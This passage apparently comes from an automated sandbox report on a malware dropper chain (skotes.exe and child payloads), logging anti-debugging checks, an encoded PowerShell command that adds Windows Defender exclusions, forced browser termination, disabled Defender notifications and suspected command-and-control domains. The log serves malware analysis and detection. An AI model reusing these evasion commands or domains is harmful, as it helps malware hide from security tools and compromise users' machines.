                          Source: C:\Users\user\AppData\Local\Temp\33QCBA038D3K2VF7AVBGWF5K.exeOpen window title or class name: gbdyllo
                          Source: C:\Users\user\AppData\Local\Temp\33QCBA038D3K2VF7AVBGWF5K.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                          Source: C:\Users\user\AppData\Local\Temp\33QCBA038D3K2VF7AVBGWF5K.exeOpen window title or class name: procmon_window_class
                          Source: C:\Users\user\AppData\Local\Temp\33QCBA038D3K2VF7AVBGWF5K.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                          Source: C:\Users\user\AppData\Local\Temp\33QCBA038D3K2VF7AVBGWF5K.exeOpen window title or class name: ollydbg
                          Source: C:\Users\user\AppData\Local\Temp\33QCBA038D3K2VF7AVBGWF5K.exeOpen window title or class name: filemonclass
                          Source: C:\Users\user\AppData\Local\Temp\33QCBA038D3K2VF7AVBGWF5K.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                          Source: C:\Users\user\AppData\Local\Temp\33QCBA038D3K2VF7AVBGWF5K.exeFile opened: NTICE
                          Source: C:\Users\user\AppData\Local\Temp\33QCBA038D3K2VF7AVBGWF5K.exeFile opened: SICE
                          Source: C:\Users\user\AppData\Local\Temp\33QCBA038D3K2VF7AVBGWF5K.exeFile opened: SIWVID
                          Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeProcess queried: DebugPort
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess queried: DebugPort
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1003346001\8a0ff7e068.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1003346001\8a0ff7e068.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1003346001\8a0ff7e068.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\33QCBA038D3K2VF7AVBGWF5K.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\33QCBA038D3K2VF7AVBGWF5K.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\33QCBA038D3K2VF7AVBGWF5K.exeProcess queried: DebugPort
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_05180DC1 rdtsc 0_2_05180DC1
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_004E652B mov eax, dword ptr fs:[00000030h]6_2_004E652B
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_004EA302 mov eax, dword ptr fs:[00000030h]6_2_004EA302
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
                          Source: C:\Users\user\AppData\Local\Temp\1003346001\8a0ff7e068.exeProcess token adjusted: Debug
                          Source: C:\Users\user\AppData\Local\Temp\33QCBA038D3K2VF7AVBGWF5K.exeProcess token adjusted: Debug
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeMemory allocated: page read and write | page guardJump to behavior

                          HIPS / PFW / Operating System Protection Evasion

                          barindex
                          Source: Yara matchFile source: Process Memory Space: 0d8313073f.exe PID: 4136, type: MEMORYSTR
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeProcess created: Base64 decoded Add-MpPreference -ExclusionPath C:\Users\jones\AppData\Local\Temp\1003334001\Fwkdsz.exe; Add-MpPreference -ExclusionProcess C:\Users\jones\AppData\Local\Temp\1003334001\Fwkdsz.exe;Add-MpPreference -ExclusionPath C:\Users\jones\AppData\Roaming\DiagTrack.exe; Add-MpPreference -ExclusionProcess C:\Users\jones\AppData\Roaming\DiagTrack.exe
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeProcess created: Base64 decoded Add-MpPreference -ExclusionPath C:\Users\jones\AppData\Local\Temp\1003334001\Fwkdsz.exe; Add-MpPreference -ExclusionProcess C:\Users\jones\AppData\Local\Temp\1003334001\Fwkdsz.exe;Add-MpPreference -ExclusionPath C:\Users\jones\AppData\Roaming\DiagTrack.exe; Add-MpPreference -ExclusionProcess C:\Users\jones\AppData\Roaming\DiagTrack.exeJump to behavior
                          Source: 24da741fb6.exe, 0000000B.00000003.2496351529.0000000004DF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: scriptyprefej.store
                          Source: 24da741fb6.exe, 0000000B.00000003.2496351529.0000000004DF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: navygenerayk.store
                          Source: 24da741fb6.exe, 0000000B.00000003.2496351529.0000000004DF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: founpiuer.store
                          Source: 24da741fb6.exe, 0000000B.00000003.2496351529.0000000004DF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: necklacedmny.store
                          Source: 24da741fb6.exe, 0000000B.00000003.2496351529.0000000004DF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: thumbystriw.store
                          Source: 24da741fb6.exe, 0000000B.00000003.2496351529.0000000004DF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: fadehairucw.store
                          Source: 24da741fb6.exe, 0000000B.00000003.2496351529.0000000004DF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: crisiwarny.store
                          Source: 24da741fb6.exe, 0000000B.00000003.2496351529.0000000004DF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: presticitpo.store
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exe "C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exe "C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exe "C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1003345001\203f60e481.exe "C:\Users\user\AppData\Local\Temp\1003345001\203f60e481.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1003346001\8a0ff7e068.exe "C:\Users\user\AppData\Local\Temp\1003346001\8a0ff7e068.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAMQAwADAAMwAzADMANAAwADAAMQBcAEYAdwBrAGQAcwB6AC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADEAMAAwADMAMwAzADQAMAAwADEAXABGAHcAawBkAHMAegAuAGUAeABlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwARABpAGEAZwBUAHIAYQBjAGsALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwARABpAGEAZwBUAHIAYQBjAGsALgBlAHgAZQA=Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003345001\203f60e481.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
                          Source: C:\Users\user\AppData\Local\Temp\1003345001\203f60e481.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
                          Source: C:\Users\user\AppData\Local\Temp\1003345001\203f60e481.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
                          Source: C:\Users\user\AppData\Local\Temp\1003345001\203f60e481.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
                          Source: C:\Users\user\AppData\Local\Temp\1003345001\203f60e481.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -enc qqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaemaogbcafuacwblahiacwbcagoabwbuaguacwbcaeeacabwaeqayqb0ageaxabmag8aywbhagwaxabuaguabqbwafwamqawadaamwazadmanaawadaamqbcaeyadwbragqacwb6ac4azqb4aguaowagaeeazabkac0atqbwafaacgblagyazqbyaguabgbjaguaiaataeuaeabjagwadqbzagkabwbuafaacgbvagmazqbzahmaiabdadoaxabvahmazqbyahmaxabqag8abgblahmaxabbahaacabeageadabhafwatabvagmayqbsafwavablag0acabcadeamaawadmamwazadqamaawadeaxabgahcaawbkahmaegauaguaeabladsaqqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaemaogbcafuacwblahiacwbcagoabwbuaguacwbcaeeacabwaeqayqb0ageaxabsag8ayqbtagkabgbnafwarabpageazwbuahiayqbjagsalgblahgazqa7acaaqqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagac0arqb4agmabab1ahmaaqbvag4auabyag8aywblahmacwagaemaogbcafuacwblahiacwbcagoabwbuaguacwbcaeeacabwaeqayqb0ageaxabsag8ayqbtagkabgbnafwarabpageazwbuahiayqbjagsalgblahgazqa=
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -enc qqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaemaogbcafuacwblahiacwbcagoabwbuaguacwbcaeeacabwaeqayqb0ageaxabmag8aywbhagwaxabuaguabqbwafwamqawadaamwazadmanaawadaamqbcaeyadwbragqacwb6ac4azqb4aguaowagaeeazabkac0atqbwafaacgblagyazqbyaguabgbjaguaiaataeuaeabjagwadqbzagkabwbuafaacgbvagmazqbzahmaiabdadoaxabvahmazqbyahmaxabqag8abgblahmaxabbahaacabeageadabhafwatabvagmayqbsafwavablag0acabcadeamaawadmamwazadqamaawadeaxabgahcaawbkahmaegauaguaeabladsaqqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaemaogbcafuacwblahiacwbcagoabwbuaguacwbcaeeacabwaeqayqb0ageaxabsag8ayqbtagkabgbnafwarabpageazwbuahiayqbjagsalgblahgazqa7acaaqqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagac0arqb4agmabab1ahmaaqbvag4auabyag8aywblahmacwagaemaogbcafuacwblahiacwbcagoabwbuaguacwbcaeeacabwaeqayqb0ageaxabsag8ayqbtagkabgbnafwarabpageazwbuahiayqbjagsalgblahgazqa=Jump to behavior
                          Source: 203f60e481.exe, 0000000F.00000002.2683902939.0000000000112000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                          Source: 0d8313073f.exe, 0000000D.00000002.2928434027.0000000000A7F000.00000040.00000001.01000000.0000000D.sdmpBinary or memory string: 4-Program Manager
                          Source: file.exe, 00000000.00000002.1704179638.0000000000992000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000001.00000002.1734127491.00000000006A2000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000002.00000002.1736207087.00000000006A2000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: o.'R&Program Manager
                          Source: skotes.exe, skotes.exe, 00000006.00000002.2923832942.00000000006A2000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: .'R&Program Manager
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_004CD3E2 cpuid 6_2_004CD3E2
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1003345001\203f60e481.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1003345001\203f60e481.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1003346001\8a0ff7e068.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1003346001\8a0ff7e068.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_004CCBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,6_2_004CCBEA
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_004B65E0 LookupAccountNameA,6_2_004B65E0
                          Source: C:\Users\user\AppData\Local\Temp\1003334001\Fwkdsz.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                          Lowering of HIPS / PFW / Operating System Security Settings

                          barindex
                          Source: C:\Users\user\AppData\Local\Temp\1003346001\8a0ff7e068.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1
